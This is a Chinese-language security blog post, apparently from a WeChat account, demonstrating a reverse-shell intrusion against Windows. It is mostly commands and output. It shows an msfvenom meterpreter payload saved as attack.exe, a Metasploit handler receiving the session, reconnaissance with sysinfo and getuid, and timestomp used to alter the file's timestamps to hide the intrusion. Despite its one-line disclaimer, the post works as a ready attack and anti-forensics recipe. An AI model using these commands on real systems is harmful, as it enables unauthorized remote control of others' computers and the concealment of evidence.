反弹入侵（几乎适用于任何windows主机）(（请勿用于非法操作！！！）)

root@kali:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe> /root/attack.exe

No platform was selected, choosingMsf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 fromthe payload

No encoder or badchars specified,outputting raw payload

Payload size: 333 bytes

Final size of exe file: 73802 bytes

Saved as: /root/attack.exe            （病毒）

root@kali:~# service postgresql start

root@kali:~# msfconsole

root@kali:~# db_status

msf > use exploit/multi/handler

msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost192.168.1.117                            (kali linux主机)

msf exploit(handler) > set lport 1234

msf exploit(handler) > show options

msf exploit(handler) > exploit -h

msf exploit(handler) > exploit -j z

[*] Exploit running as background job.

[*] Started reverse TCP handler on192.168.1.117:1234

msf exploit(handler) > [*] Starting thepayload handler...

开始监听

windows主机运行attack.exe

msf exploit(handler) > [*] Starting thepayload handler...

[*] Sending stage (957999 bytes) to192.168.1.94

[*] Meterpreter session 1 opened(192.168.1.117:1234 -> 192.168.1.94:58540) at 2017-03-10 00:16:54 -0500    (windows主机运行attack.exe后产生session 1)

msf exploit(handler) > sessions -i

Active sessions

===============

 Id  Type                   Information              Connection

 --  ----                   -----------              ----------

 1   meterpreter x86/win32  sh-270sewells @ SH-270  192.168.1.117:1234 -> 192.168.1.94:58540(192.168.1.94)

msf exploit(handler) > sessions -i1               (1是session Id号码)

meterpreter > pwd                        （成功登陆）

C:UserssewellsDesktop

meterpreter > sysinfo

Computer       : SH-270

OS              : Windows 10 (Build 14393).

Architecture    : x64 (Current Process is WOW64)

System Language : zh_CN

Domain          : WORKGROUP

Logged On Users : 1

Meterpreter     : x86/win32

meterpreter > getuid

Server username: sh-270sewells

meterpreter > timestomp -h            修改入侵时间

meterpreter > timestomp attack.exe -v

Modified      : 2017-03-10 00:01:11 -0500

Accessed      : 2017-03-10 00:03:26 -0500

Created       : 2017-03-10 00:18:07 -0500

Entry Modified: 2017-03-10 00:18:07 -0500

本文始发于微信公众号（飓风网络安全）：反弹入侵（几乎适用于任何windows主机）(（请勿用于非法操作！！！）)